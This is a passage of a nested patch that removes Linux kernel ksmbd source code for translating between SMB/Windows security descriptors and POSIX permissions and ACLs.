+-		dst->sub_auth[i] = src->sub_auth[i];
+-}
+-
+-/*
+- * change posix mode to reflect permissions
+- * pmode is the existing mode (we only want to overwrite part of this
+- * bits to set can be: S_IRWXU, S_IRWXG or S_IRWXO ie 00700 or 00070 or 00007
+- */
+-static umode_t access_flags_to_mode(struct smb_fattr *fattr, __le32 ace_flags,
+-				    int type)
+-{
+-	__u32 flags = le32_to_cpu(ace_flags);
+-	umode_t mode = 0;
+-
+-	if (flags & GENERIC_ALL) {
+-		mode = 0777;
+-		ksmbd_debug(SMB, "all perms\n");
+-		return mode;
+-	}
+-
+-	if ((flags & GENERIC_READ) || (flags & FILE_READ_RIGHTS))
+-		mode = 0444;
+-	if ((flags & GENERIC_WRITE) || (flags & FILE_WRITE_RIGHTS)) {
+-		mode |= 0222;
+-		if (S_ISDIR(fattr->cf_mode))
+-			mode |= 0111;
+-	}
+-	if ((flags & GENERIC_EXECUTE) || (flags & FILE_EXEC_RIGHTS))
+-		mode |= 0111;
+-
+-	if (type == ACCESS_DENIED_ACE_TYPE || type == ACCESS_DENIED_OBJECT_ACE_TYPE)
+-		mode = ~mode;
+-
+-	ksmbd_debug(SMB, "access flags 0x%x mode now %04o\n", flags, mode);
+-
+-	return mode;
+-}
+-
+-/*
+- * Generate access flags to reflect permissions mode is the existing mode.
+- * This function is called for every ACE in the DACL whose SID matches
+- * with either owner or group or everyone.
+- */
+-static void mode_to_access_flags(umode_t mode, umode_t bits_to_use,
+-				 __u32 *pace_flags)
+-{
+-	/* reset access mask */
+-	*pace_flags = 0x0;
+-
+-	/* bits to use are either S_IRWXU or S_IRWXG or S_IRWXO */
+-	mode &= bits_to_use;
+-
+-	/*
+-	 * check for R/W/X UGO since we do not know whose flags
+-	 * is this but we have cleared all the bits sans RWX for
+-	 * either user or group or other as per bits_to_use
+-	 */
+-	if (mode & 0444)
+-		*pace_flags |= SET_FILE_READ_RIGHTS;
+-	if (mode & 0222)
+-		*pace_flags |= FILE_WRITE_RIGHTS;
+-	if (mode & 0111)
+-		*pace_flags |= SET_FILE_EXEC_RIGHTS;
+-
+-	ksmbd_debug(SMB, "mode: %o, access flags now 0x%x\n",
+-		    mode, *pace_flags);
+-}
+-
+-static __u16 fill_ace_for_sid(struct smb_ace *pntace,
+-			      const struct smb_sid *psid, int type, int flags,
+-			      umode_t mode, umode_t bits)
+-{
+-	int i;
+-	__u16 size = 0;
+-	__u32 access_req = 0;
+-
+-	pntace->type = type;
+-	pntace->flags = flags;
+-	mode_to_access_flags(mode, bits, &access_req);
+-	if (!access_req)
+-		access_req = SET_MINIMUM_RIGHTS;
+-	pntace->access_req = cpu_to_le32(access_req);
+-
+-	pntace->sid.revision = psid->revision;
+-	pntace->sid.num_subauth = psid->num_subauth;
+-	for (i = 0; i < NUM_AUTHS; i++)
+-		pntace->sid.authority[i] = psid->authority[i];
+-	for (i = 0; i < psid->num_subauth; i++)
+-		pntace->sid.sub_auth[i] = psid->sub_auth[i];
+-
+-	size = 1 + 1 + 2 + 4 + 1 + 1 + 6 + (psid->num_subauth * 4);
+-	pntace->size = cpu_to_le16(size);
+-
+-	return size;
+-}
+-
+-void id_to_sid(unsigned int cid, uint sidtype, struct smb_sid *ssid)
+-{
+-	switch (sidtype) {
+-	case SIDOWNER:
+-		smb_copy_sid(ssid, &server_conf.domain_sid);
+-		break;
+-	case SIDUNIX_USER:
+-		smb_copy_sid(ssid, &sid_unix_users);
+-		break;
+-	case SIDUNIX_GROUP:
+-		smb_copy_sid(ssid, &sid_unix_groups);
+-		break;
+-	case SIDCREATOR_OWNER:
+-		smb_copy_sid(ssid, &creator_owner);
+-		return;
+-	case SIDCREATOR_GROUP:
+-		smb_copy_sid(ssid, &creator_group);
+-		return;
+-	case SIDNFS_USER:
+-		smb_copy_sid(ssid, &sid_unix_NFS_users);
+-		break;
+-	case SIDNFS_GROUP:
+-		smb_copy_sid(ssid, &sid_unix_NFS_groups);
+-		break;
+-	case SIDNFS_MODE:
+-		smb_copy_sid(ssid, &sid_unix_NFS_mode);
+-		break;
+-	default:
+-		return;
+-	}
+-
+-	/* RID */
+-	ssid->sub_auth[ssid->num_subauth] = cpu_to_le32(cid);
+-	ssid->num_subauth++;
+-}
+-
+-static int sid_to_id(struct user_namespace *user_ns,
+-		     struct smb_sid *psid, uint sidtype,
+-		     struct smb_fattr *fattr)
+-{
+-	int rc = -EINVAL;
+-
+-	/*
+-	 * If we have too many subauthorities, then something is really wrong.
+-	 * Just return an error.
+-	 */
+-	if (unlikely(psid->num_subauth > SID_MAX_SUB_AUTHORITIES)) {
+-		pr_err("%s: %u subauthorities is too many!\n",
+-		       __func__, psid->num_subauth);
+-		return -EIO;
+-	}
+-
+-	if (sidtype == SIDOWNER) {
+-		kuid_t uid;
+-		uid_t id;
+-
+-		id = le32_to_cpu(psid->sub_auth[psid->num_subauth - 1]);
+-		uid = KUIDT_INIT(id);
+-		uid = from_vfsuid(user_ns, &init_user_ns, VFSUIDT_INIT(uid));
+-		if (uid_valid(uid)) {
+-			fattr->cf_uid = uid;
+-			rc = 0;
+-		}
+-	} else {
+-		kgid_t gid;
+-		gid_t id;
+-
+-		id = le32_to_cpu(psid->sub_auth[psid->num_subauth - 1]);
+-		gid = KGIDT_INIT(id);
+-		gid = from_vfsgid(user_ns, &init_user_ns, VFSGIDT_INIT(gid));
+-		if (gid_valid(gid)) {
+-			fattr->cf_gid = gid;
+-			rc = 0;
+-		}
+-	}
+-
+-	return rc;
+-}
+-
+-void posix_state_to_acl(struct posix_acl_state *state,
+-			struct posix_acl_entry *pace)
+-{
+-	int i;
+-
+-	pace->e_tag = ACL_USER_OBJ;
+-	pace->e_perm = state->owner.allow;
+-	for (i = 0; i < state->users->n; i++) {
+-		pace++;
+-		pace->e_tag = ACL_USER;
+-		pace->e_uid = state->users->aces[i].uid;
+-		pace->e_perm = state->users->aces[i].perms.allow;
+-	}
+-
+-	pace++;
+-	pace->e_tag = ACL_GROUP_OBJ;
+-	pace->e_perm = state->group.allow;
+-
+-	for (i = 0; i < state->groups->n; i++) {
+-		pace++;
+-		pace->e_tag = ACL_GROUP;
+-		pace->e_gid = state->groups->aces[i].gid;
+-		pace->e_perm = state->groups->aces[i].perms.allow;
+-	}
+-
+-	if (state->users->n || state->groups->n) {
+-		pace++;
+-		pace->e_tag = ACL_MASK;
+-		pace->e_perm = state->mask.allow;
+-	}
+-
+-	pace++;
+-	pace->e_tag = ACL_OTHER;
+-	pace->e_perm = state->other.allow;
+-}
+-
+-int init_acl_state(struct posix_acl_state *state, int cnt)
+-{
+-	int alloc;
+-
+-	memset(state, 0, sizeof(struct posix_acl_state));
+-	/*
+-	 * In the worst case, each individual acl could be for a distinct
+-	 * named user or group, but we don't know which, so we allocate
+-	 * enough space for either:
+-	 */
+-	alloc = sizeof(struct posix_ace_state_array)
+-		+ cnt * sizeof(struct posix_user_ace_state);
+-	state->users = kzalloc(alloc, GFP_KERNEL);
+-	if (!state->users)
+-		return -ENOMEM;
+-	state->groups = kzalloc(alloc, GFP_KERNEL);
+-	if (!state->groups) {
+-		kfree(state->users);
+-		return -ENOMEM;
+-	}
+-	return 0;
+-}
+-
+-void free_acl_state(struct posix_acl_state *state)
+-{
+-	kfree(state->users);
+-	kfree(state->groups);
+-}
+-
+-static void parse_dacl(struct user_namespace *user_ns,
+-		       struct smb_acl *pdacl, char *end_of_acl,
+-		       struct smb_sid *pownersid, struct smb_sid *pgrpsid,
+-		       struct smb_fattr *fattr)
+-{
+-	int i, ret;
+-	int num_aces = 0;
+-	unsigned int acl_size;
+-	char *acl_base;
+-	struct smb_ace **ppace;
+-	struct posix_acl_entry *cf_pace, *cf_pdace;
+-	struct posix_acl_state acl_state, default_acl_state;
+-	umode_t mode = 0, acl_mode;
+-	bool owner_found = false, group_found = false, others_found = false;
+-
+-	if (!pdacl)
+-		return;
+-
+-	/* validate that we do not go past end of acl */
+-	if (end_of_acl < (char *)pdacl + sizeof(struct smb_acl) ||
+-	    end_of_acl < (char *)pdacl + le16_to_cpu(pdacl->size)) {
+-		pr_err("ACL too small to parse DACL\n");
+-		return;
+-	}
+-
+-	ksmbd_debug(SMB, "DACL revision %d size %d num aces %d\n",
+-		    le16_to_cpu(pdacl->revision), le16_to_cpu(pdacl->size),
+-		    le32_to_cpu(pdacl->num_aces));
+-
+-	acl_base = (char *)pdacl;
+-	acl_size = sizeof(struct smb_acl);
+-
+-	num_aces = le32_to_cpu(pdacl->num_aces);
+-	if (num_aces <= 0)
+-		return;
+-
+-	if (num_aces > ULONG_MAX / sizeof(struct smb_ace *))
+-		return;
+-
+-	ppace = kmalloc_array(num_aces, sizeof(struct smb_ace *), GFP_KERNEL);
+-	if (!ppace)
+-		return;
+-
+-	ret = init_acl_state(&acl_state, num_aces);
+-	if (ret)
+-		return;
+-	ret = init_acl_state(&default_acl_state, num_aces);
+-	if (ret) {
+-		free_acl_state(&acl_state);
+-		return;
+-	}
+-
+-	/*
+-	 * reset rwx permissions for user/group/other.
+-	 * Also, if num_aces is 0 i.e. DACL has no ACEs,
+-	 * user/group/other have no permissions
+-	 */
+-	for (i = 0; i < num_aces; ++i) {
+-		if (end_of_acl - acl_base < acl_size)
+-			break;
+-
+-		ppace[i] = (struct smb_ace *)(acl_base + acl_size);
+-		acl_base = (char *)ppace[i];
+-		acl_size = offsetof(struct smb_ace, sid) +
+-			offsetof(struct smb_sid, sub_auth);
+-
+-		if (end_of_acl - acl_base < acl_size ||
+-		    ppace[i]->sid.num_subauth > SID_MAX_SUB_AUTHORITIES ||
+-		    (end_of_acl - acl_base <
+-		     acl_size + sizeof(__le32) * ppace[i]->sid.num_subauth) ||
+-		    (le16_to_cpu(ppace[i]->size) <
+-		     acl_size + sizeof(__le32) * ppace[i]->sid.num_subauth))
+-			break;
+-
+-		acl_size = le16_to_cpu(ppace[i]->size);
+-		ppace[i]->access_req =
+-			smb_map_generic_desired_access(ppace[i]->access_req);
+-
+-		if (!(compare_sids(&ppace[i]->sid, &sid_unix_NFS_mode))) {
+-			fattr->cf_mode =
+-				le32_to_cpu(ppace[i]->sid.sub_auth[2]);
+-			break;
+-		} else if (!compare_sids(&ppace[i]->sid, pownersid)) {
+-			acl_mode = access_flags_to_mode(fattr,
+-							ppace[i]->access_req,
+-							ppace[i]->type);
+-			acl_mode &= 0700;
+-
+-			if (!owner_found) {
+-				mode &= ~(0700);
+-				mode |= acl_mode;
+-			}
+-			owner_found = true;
+-		} else if (!compare_sids(&ppace[i]->sid, pgrpsid) ||
+-			   ppace[i]->sid.sub_auth[ppace[i]->sid.num_subauth - 1] ==
+-			    DOMAIN_USER_RID_LE) {
+-			acl_mode = access_flags_to_mode(fattr,
+-							ppace[i]->access_req,
+-							ppace[i]->type);
+-			acl_mode &= 0070;
+-			if (!group_found) {
+-				mode &= ~(0070);
+-				mode |= acl_mode;
+-			}
+-			group_found = true;
+-		} else if (!compare_sids(&ppace[i]->sid, &sid_everyone)) {
+-			acl_mode = access_flags_to_mode(fattr,
+-							ppace[i]->access_req,
+-							ppace[i]->type);
+-			acl_mode &= 0007;
+-			if (!others_found) {
+-				mode &= ~(0007);
+-				mode |= acl_mode;
+-			}
+-			others_found = true;
+-		} else if (!compare_sids(&ppace[i]->sid, &creator_owner)) {
+-			continue;
+-		} else if (!compare_sids(&ppace[i]->sid, &creator_group)) {
+-			continue;
+-		} else if (!compare_sids(&ppace[i]->sid, &sid_authusers)) {
+-			continue;
+-		} else {
+-			struct smb_fattr temp_fattr;
+-
+-			acl_mode = access_flags_to_mode(fattr, ppace[i]->access_req,
+-							ppace[i]->type);
+-			temp_fattr.cf_uid = INVALID_UID;
+-			ret = sid_to_id(user_ns, &ppace[i]->sid, SIDOWNER, &temp_fattr);
+-			if (ret || uid_eq(temp_fattr.cf_uid, INVALID_UID)) {
+-				pr_err("%s: Error %d mapping Owner SID to uid\n",
+-				       __func__, ret);
+-				continue;
+-			}
+-
+-			acl_state.owner.allow = ((acl_mode & 0700) >> 6) | 0004;
+-			acl_state.users->aces[acl_state.users->n].uid =
+-				temp_fattr.cf_uid;
+-			acl_state.users->aces[acl_state.users->n++].perms.allow =
+-				((acl_mode & 0700) >> 6) | 0004;
+-			default_acl_state.owner.allow = ((acl_mode & 0700) >> 6) | 0004;
+-			default_acl_state.users->aces[default_acl_state.users->n].uid =
+-				temp_fattr.cf_uid;
+-			default_acl_state.users->aces[default_acl_state.users->n++].perms.allow =
+-				((acl_mode & 0700) >> 6) | 0004;
+-		}
+-	}
+-	kfree(ppace);
+-
+-	if (owner_found) {
+-		/* The owner must be set to at least read-only. */
+-		acl_state.owner.allow = ((mode & 0700) >> 6) | 0004;
+-		acl_state.users->aces[acl_state.users->n].uid = fattr->cf_uid;
+-		acl_state.users->aces[acl_state.users->n++].perms.allow =
+-			((mode & 0700) >> 6) | 0004;
+-		default_acl_state.owner.allow = ((mode & 0700) >> 6) | 0004;
+-		default_acl_state.users->aces[default_acl_state.users->n].uid =
+-			fattr->cf_uid;
+-		default_acl_state.users->aces[default_acl_state.users->n++].perms.allow =
+-			((mode & 0700) >> 6) | 0004;
+-	}
+-
+-	if (group_found) {
+-		acl_state.group.allow = (mode & 0070) >> 3;
+-		acl_state.groups->aces[acl_state.groups->n].gid =
+-			fattr->cf_gid;
+-		acl_state.groups->aces[acl_state.groups->n++].perms.allow =
+-			(mode & 0070) >> 3;
+-		default_acl_state.group.allow = (mode & 0070) >> 3;
+-		default_acl_state.groups->aces[default_acl_state.groups->n].gid =
+-			fattr->cf_gid;
+-		default_acl_state.groups->aces[default_acl_state.groups->n++].perms.allow =
+-			(mode & 0070) >> 3;
+-	}
+-
+-	if (others_found) {
+-		fattr->cf_mode &= ~(0007);
+-		fattr->cf_mode |= mode & 0007;
+-
+-		acl_state.other.allow = mode & 0007;
+-		default_acl_state.other.allow = mode & 0007;
+-	}
+-
+-	if (acl_state.users->n || acl_state.groups->n) {
+-		acl_state.mask.allow = 0x07;
+-
+-		if (IS_ENABLED(CONFIG_FS_POSIX_ACL)) {
+-			fattr->cf_acls =
+-				posix_acl_alloc(acl_state.users->n +
+-					acl_state.groups->n + 4, GFP_KERNEL);
+-			if (fattr->cf_acls) {
+-				cf_pace = fattr->cf_acls->a_entries;
+-				posix_state_to_acl(&acl_state, cf_pace);
+-			}
+-		}
+-	}
+-
+-	if (default_acl_state.users->n || default_acl_state.groups->n) {
+-		default_acl_state.mask.allow = 0x07;
+-
+-		if (IS_ENABLED(CONFIG_FS_POSIX_ACL)) {
+-			fattr->cf_dacls =
+-				posix_acl_alloc(default_acl_state.users->n +
+-				default_acl_state.groups->n + 4, GFP_KERNEL);
+-			if (fattr->cf_dacls) {
+-				cf_pdace = fattr->cf_dacls->a_entries;
+-				posix_state_to_acl(&default_acl_state, cf_pdace);
+-			}
+-		}
+-	}
+-	free_acl_state(&acl_state);
+-	free_acl_state(&default_acl_state);
+-}
+-
+-static void set_posix_acl_entries_dacl(struct user_namespace *user_ns,
+-				       struct smb_ace *pndace,
+-				       struct smb_fattr *fattr, u32 *num_aces,
+-				       u16 *size, u32 nt_aces_num)
+-{
+-	struct posix_acl_entry *pace;
+-	struct smb_sid *sid;
+-	struct smb_ace *ntace;
+-	int i, j;
+-
+-	if (!fattr->cf_acls)
+-		goto posix_default_acl;
+-
+-	pace = fattr->cf_acls->a_entries;
+-	for (i = 0; i < fattr->cf_acls->a_count; i++, pace++) {
+-		int flags = 0;
+-
+-		sid = kmalloc(sizeof(struct smb_sid), GFP_KERNEL);
+-		if (!sid)
+-			break;
+-
+-		if (pace->e_tag == ACL_USER) {
+-			uid_t uid;
+-			unsigned int sid_type = SIDOWNER;
+-
+-			uid = posix_acl_uid_translate(user_ns, pace);
+-			if (!uid)
+-				sid_type = SIDUNIX_USER;
+-			id_to_sid(uid, sid_type, sid);
+-		} else if (pace->e_tag == ACL_GROUP) {
+-			gid_t gid;
+-
+-			gid = posix_acl_gid_translate(user_ns, pace);
+-			id_to_sid(gid, SIDUNIX_GROUP, sid);
+-		} else if (pace->e_tag == ACL_OTHER && !nt_aces_num) {
+-			smb_copy_sid(sid, &sid_everyone);
+-		} else {
+-			kfree(sid);
+-			continue;
+-		}
+-		ntace = pndace;
+-		for (j = 0; j < nt_aces_num; j++) {
+-			if (ntace->sid.sub_auth[ntace->sid.num_subauth - 1] ==
+-					sid->sub_auth[sid->num_subauth - 1])
+-				goto pass_same_sid;
+-			ntace = (struct smb_ace *)((char *)ntace +
+-					le16_to_cpu(ntace->size));
+-		}
+-
+-		if (S_ISDIR(fattr->cf_mode) && pace->e_tag == ACL_OTHER)
+-			flags = 0x03;
+-
+-		ntace = (struct smb_ace *)((char *)pndace + *size);
+-		*size += fill_ace_for_sid(ntace, sid, ACCESS_ALLOWED, flags,
+-				pace->e_perm, 0777);
+-		(*num_aces)++;
+-		if (pace->e_tag == ACL_USER)
+-			ntace->access_req |=
+-				FILE_DELETE_LE | FILE_DELETE_CHILD_LE;
+-
+-		if (S_ISDIR(fattr->cf_mode) &&
+-		    (pace->e_tag == ACL_USER || pace->e_tag == ACL_GROUP)) {
+-			ntace = (struct smb_ace *)((char *)pndace + *size);
+-			*size += fill_ace_for_sid(ntace, sid, ACCESS_ALLOWED,
+-					0x03, pace->e_perm, 0777);
+-			(*num_aces)++;
+-			if (pace->e_tag == ACL_USER)
+-				ntace->access_req |=
+-					FILE_DELETE_LE | FILE_DELETE_CHILD_LE;
+-		}
+-
+-pass_same_sid:
+-		kfree(sid);
+-	}
+-
+-	if (nt_aces_num)
+-		return;
+-
+-posix_default_acl:
+-	if (!fattr->cf_dacls)
+-		return;
+-
+-	pace = fattr->cf_dacls->a_entries;
+-	for (i = 0; i < fattr->cf_dacls->a_count; i++, pace++) {
+-		sid = kmalloc(sizeof(struct smb_sid), GFP_KERNEL);
+-		if (!sid)
+-			break;
+-
+-		if (pace->e_tag == ACL_USER) {
+-			uid_t uid;
+-
+-			uid = posix_acl_uid_translate(user_ns, pace);
+-			id_to_sid(uid, SIDCREATOR_OWNER, sid);
+-		} else if (pace->e_tag == ACL_GROUP) {
+-			gid_t gid;
+-
+-			gid = posix_acl_gid_translate(user_ns, pace);
+-			id_to_sid(gid, SIDCREATOR_GROUP, sid);
+-		} else {
+-			kfree(sid);
+-			continue;
+-		}
+-
+-		ntace = (struct smb_ace *)((char *)pndace + *size);
+-		*size += fill_ace_for_sid(ntace, sid, ACCESS_ALLOWED, 0x0b,
+-				pace->e_perm, 0777);
+-		(*num_aces)++;
+-		if (pace->e_tag == ACL_USER)
+-			ntace->access_req |=
+-				FILE_DELETE_LE | FILE_DELETE_CHILD_LE;
+-		kfree(sid);
+-	}
+-}
+-
+-static void set_ntacl_dacl(struct user_namespace *user_ns,
+-			   struct smb_acl *pndacl,
+-			   struct smb_acl *nt_dacl,
+-			   unsigned int aces_size,
+-			   const struct smb_sid *pownersid,
+-			   const struct smb_sid *pgrpsid,
+-			   struct smb_fattr *fattr)
+-{
+-	struct smb_ace *ntace, *pndace;
+-	int nt_num_aces = le32_to_cpu(nt_dacl->num_aces), num_aces = 0;
+-	unsigned short size = 0;
+-	int i;
+-
+-	pndace = (struct smb_ace *)((char *)pndacl + sizeof(struct smb_acl));
+-	if (nt_num_aces) {
+-		ntace = (struct smb_ace *)((char *)nt_dacl + sizeof(struct smb_acl));
+-		for (i = 0; i < nt_num_aces; i++) {
+-			unsigned short nt_ace_size;
+-
+-			if (offsetof(struct smb_ace, access_req) > aces_size)
+-				break;
+-
+-			nt_ace_size = le16_to_cpu(ntace->size);
+-			if (nt_ace_size > aces_size)
+-				break;
+-
+-			memcpy((char *)pndace + size, ntace, nt_ace_size);
+-			size += nt_ace_size;
+-			aces_size -= nt_ace_size;
+-			ntace = (struct smb_ace *)((char *)ntace + nt_ace_size);
+-			num_aces++;
+-		}
+-	}
+-
+-	set_posix_acl_entries_dacl(user_ns, pndace, fattr,
+-				   &num_aces, &size, nt_num_aces);
+-	pndacl->num_aces = cpu_to_le32(num_aces);
+-	pndacl->size = cpu_to_le16(le16_to_cpu(pndacl->size) + size);
+-}
+-
+-static void set_mode_dacl(struct user_namespace *user_ns,
+-			  struct smb_acl *pndacl, struct smb_fattr *fattr)
+-{
+-	struct smb_ace *pace, *pndace;
+-	u32 num_aces = 0;
+-	u16 size = 0, ace_size = 0;
+-	uid_t uid;
+-	const struct smb_sid *sid;
+-
+-	pace = pndace = (struct smb_ace *)((char *)pndacl + sizeof(struct smb_acl));
+-
+-	if (fattr->cf_acls) {
+-		set_posix_acl_entries_dacl(user_ns, pndace, fattr,
+-					   &num_aces, &size, num_aces);
+-		goto out;
+-	}
+-
+-	/* owner RID */
+-	uid = from_kuid(&init_user_ns, fattr->cf_uid);
+-	if (uid)
+-		sid = &server_conf.domain_sid;
+-	else
+-		sid = &sid_unix_users;
+-	ace_size = fill_ace_for_sid(pace, sid, ACCESS_ALLOWED, 0,
+-				    fattr->cf_mode, 0700);
+-	pace->sid.sub_auth[pace->sid.num_subauth++] = cpu_to_le32(uid);
+-	pace->size = cpu_to_le16(ace_size + 4);
+-	size += le16_to_cpu(pace->size);
+-	pace = (struct smb_ace *)((char *)pndace + size);
+-
+-	/* Group RID */
+-	ace_size = fill_ace_for_sid(pace, &sid_unix_groups,
+-				    ACCESS_ALLOWED, 0, fattr->cf_mode, 0070);
+-	pace->sid.sub_auth[pace->sid.num_subauth++] =
+-		cpu_to_le32(from_kgid(&init_user_ns, fattr->cf_gid));
+-	pace->size = cpu_to_le16(ace_size + 4);
+-	size += le16_to_cpu(pace->size);
+-	pace = (struct smb_ace *)((char *)pndace + size);
+-	num_aces = 3;
+-
+-	if (S_ISDIR(fattr->cf_mode)) {
+-		pace = (struct smb_ace *)((char *)pndace + size);
+-
+-		/* creator owner */
+-		size += fill_ace_for_sid(pace, &creator_owner, ACCESS_ALLOWED,
+-					 0x0b, fattr->cf_mode, 0700);
+-		pace = (struct smb_ace *)((char *)pndace + size);
+-
+-		/* creator group */
+-		size += fill_ace_for_sid(pace, &creator_group, ACCESS_ALLOWED,
+-					 0x0b, fattr->cf_mode, 0070);
+-		pace = (struct smb_ace *)((char *)pndace + size);
+-		num_aces = 5;
+-	}
+-
+-	/* other */
+-	size += fill_ace_for_sid(pace, &sid_everyone, ACCESS_ALLOWED, 0,
+-				 fattr->cf_mode, 0007);
+-
+-out:
+-	pndacl->num_aces = cpu_to_le32(num_aces);
+-	pndacl->size = cpu_to_le16(le16_to_cpu(pndacl->size) + size);
+-}
+-
+-static int parse_sid(struct smb_sid *psid, char *end_of_acl)
+-{
+-	/*
+-	 * validate that we do not go past end of ACL - sid must be at least 8
+-	 * bytes long (assuming no sub-auths - e.g. the null SID
+-	 */
+-	if (end_of_acl < (char *)psid + 8) {
+-		pr_err("ACL too small to parse SID %p\n", psid);
+-		return -EINVAL;
+-	}
+-
+-	return 0;
+-}
+-
+-/* Convert CIFS ACL to POSIX form */
+-int parse_sec_desc(struct user_namespace *user_ns, struct smb_ntsd *pntsd,
+-		   int acl_len, struct smb_fattr *fattr)
+-{
+-	int rc = 0;
+-	struct smb_sid *owner_sid_ptr, *group_sid_ptr;
+-	struct smb_acl *dacl_ptr; /* no need for SACL ptr */
+-	char *end_of_acl = ((char *)pntsd) + acl_len;
+-	__u32 dacloffset;
+-	int pntsd_type;
+-
+-	if (!pntsd)
+-		return -EIO;
+-
+-	if (acl_len < sizeof(struct smb_ntsd))
+-		return -EINVAL;
+-
+-	owner_sid_ptr = (struct smb_sid *)((char *)pntsd +
+-			le32_to_cpu(pntsd->osidoffset));
+-	group_sid_ptr = (struct smb_sid *)((char *)pntsd +
+-			le32_to_cpu(pntsd->gsidoffset));
+-	dacloffset = le32_to_cpu(pntsd->dacloffset);
+-	dacl_ptr = (struct smb_acl *)((char *)pntsd + dacloffset);
+-	ksmbd_debug(SMB,
+-		    "revision %d type 0x%x ooffset 0x%x goffset 0x%x sacloffset 0x%x dacloffset 0x%x\n",
+-		    pntsd->revision, pntsd->type, le32_to_cpu(pntsd->osidoffset),
+-		    le32_to_cpu(pntsd->gsidoffset),
+-		    le32_to_cpu(pntsd->sacloffset), dacloffset);
+-
+-	pntsd_type = le16_to_cpu(pntsd->type);
+-	if (!(pntsd_type & DACL_PRESENT)) {
+-		ksmbd_debug(SMB, "DACL_PRESENT in DACL type is not set\n");
+-		return rc;
+-	}
+-
+-	pntsd->type = cpu_to_le16(DACL_PRESENT);
+-
+-	if (pntsd->osidoffset) {
+-		rc = parse_sid(owner_sid_ptr, end_of_acl);
+-		if (rc) {
+-			pr_err("%s: Error %d parsing Owner SID\n", __func__, rc);
+-			return rc;
+-		}
+-
+-		rc = sid_to_id(user_ns, owner_sid_ptr, SIDOWNER, fattr);
+-		if (rc) {
+-			pr_err("%s: Error %d mapping Owner SID to uid\n",
+-			       __func__, rc);
+-			owner_sid_ptr = NULL;
+-		}
+-	}
+-
+-	if (pntsd->gsidoffset) {
+-		rc = parse_sid(group_sid_ptr, end_of_acl);
+-		if (rc) {
+-			pr_err("%s: Error %d mapping Owner SID to gid\n",
+-			       __func__, rc);
+-			return rc;
+-		}
+-		rc = sid_to_id(user_ns, group_sid_ptr, SIDUNIX_GROUP, fattr);
+-		if (rc) {
+-			pr_err("%s: Error %d mapping Group SID to gid\n",
+-			       __func__, rc);
+-			group_sid_ptr = NULL;
+-		}
+-	}
+-
+-	if ((pntsd_type & (DACL_AUTO_INHERITED | DACL_AUTO_INHERIT_REQ)) ==
+-	    (DACL_AUTO_INHERITED | DACL_AUTO_INHERIT_REQ))
+-		pntsd->type |= cpu_to_le16(DACL_AUTO_INHERITED);
+-	if (pntsd_type & DACL_PROTECTED)
+-		pntsd->type |= cpu_to_le16(DACL_PROTECTED);
+-
+-	if (dacloffset) {
+-		parse_dacl(user_ns, dacl_ptr, end_of_acl,
+-			   owner_sid_ptr, group_sid_ptr, fattr);
+-	}
+-
+-	return 0;
+-}
+-
+-/* Convert permission bits from mode to equivalent CIFS ACL */
+-int build_sec_desc(struct user_namespace *user_ns,
+-		   struct smb_ntsd *pntsd, struct smb_ntsd *ppntsd,
+-		   int ppntsd_size, int addition_info, __u32 *secdesclen,
+-		   struct smb_fattr *fattr)
+-{
+-	int rc = 0;
+-	__u32 offset;
+-	struct smb_sid *owner_sid_ptr, *group_sid_ptr;
+-	struct smb_sid *nowner_sid_ptr, *ngroup_sid_ptr;
+-	struct smb_acl *dacl_ptr = NULL; /* no need for SACL ptr */
+-	uid_t uid;
+-	gid_t gid;
+-	unsigned int sid_type = SIDOWNER;
+-
+-	nowner_sid_ptr = kmalloc(sizeof(struct smb_sid), GFP_KERNEL);
+-	if (!nowner_sid_ptr)
+-		return -ENOMEM;
+-
+-	uid = from_kuid(&init_user_ns, fattr->cf_uid);
+-	if (!uid)
+-		sid_type = SIDUNIX_USER;
+-	id_to_sid(uid, sid_type, nowner_sid_ptr);
+-
+-	ngroup_sid_ptr = kmalloc(sizeof(struct smb_sid), GFP_KERNEL);
+-	if (!ngroup_sid_ptr) {
+-		kfree(nowner_sid_ptr);
+-		return -ENOMEM;
+-	}
+-
+-	gid = from_kgid(&init_user_ns, fattr->cf_gid);
+-	id_to_sid(gid, SIDUNIX_GROUP, ngroup_sid_ptr);
+-
+-	offset = sizeof(struct smb_ntsd);
+-	pntsd->sacloffset = 0;
+-	pntsd->revision = cpu_to_le16(1);
+-	pntsd->type = cpu_to_le16(SELF_RELATIVE);
+-	if (ppntsd)
+-		pntsd->type |= ppntsd->type;
+-
+-	if (addition_info & OWNER_SECINFO) {
+-		pntsd->osidoffset = cpu_to_le32(offset);
+-		owner_sid_ptr = (struct smb_sid *)((char *)pntsd + offset);
+-		smb_copy_sid(owner_sid_ptr, nowner_sid_ptr);
+-		offset += 1 + 1 + 6 + (nowner_sid_ptr->num_subauth * 4);
+-	}
+-
+-	if (addition_info & GROUP_SECINFO) {
+-		pntsd->gsidoffset = cpu_to_le32(offset);
+-		group_sid_ptr = (struct smb_sid *)((char *)pntsd + offset);
+-		smb_copy_sid(group_sid_ptr, ngroup_sid_ptr);
+-		offset += 1 + 1 + 6 + (ngroup_sid_ptr->num_subauth * 4);
+-	}
+-
+-	if (addition_info & DACL_SECINFO) {
+-		pntsd->type |= cpu_to_le16(DACL_PRESENT);
+-		dacl_ptr = (struct smb_acl *)((char *)pntsd + offset);
+-		dacl_ptr->revision = cpu_to_le16(2);
+-		dacl_ptr->size = cpu_to_le16(sizeof(struct smb_acl));
+-		dacl_ptr->num_aces = 0;
+-
+-		if (!ppntsd) {
+-			set_mode_dacl(user_ns, dacl_ptr, fattr);
+-		} else {
+-			struct smb_acl *ppdacl_ptr;
+-			unsigned int dacl_offset = le32_to_cpu(ppntsd->dacloffset);
+-			int ppdacl_size, ntacl_size = ppntsd_size - dacl_offset;
+-
+-			if (!dacl_offset ||
+-			    (dacl_offset + sizeof(struct smb_acl) > ppntsd_size))
+-				goto out;
+-
+-			ppdacl_ptr = (struct smb_acl *)((char *)ppntsd + dacl_offset);
+-			ppdacl_size = le16_to_cpu(ppdacl_ptr->size);
+-			if (ppdacl_size > ntacl_size ||
+-			    ppdacl_size < sizeof(struct smb_acl))
+-				goto out;
+-
+-			set_ntacl_dacl(user_ns, dacl_ptr, ppdacl_ptr,
+-				       ntacl_size - sizeof(struct smb_acl),
+-				       nowner_sid_ptr, ngroup_sid_ptr,
+-				       fattr);
+-		}
+-		pntsd->dacloffset = cpu_to_le32(offset);
+-		offset += le16_to_cpu(dacl_ptr->size);
+-	}
+-
+-out:
+-	kfree(nowner_sid_ptr);
+-	kfree(ngroup_sid_ptr);
+-	*secdesclen = offset;
+-	return rc;
+-}
+-
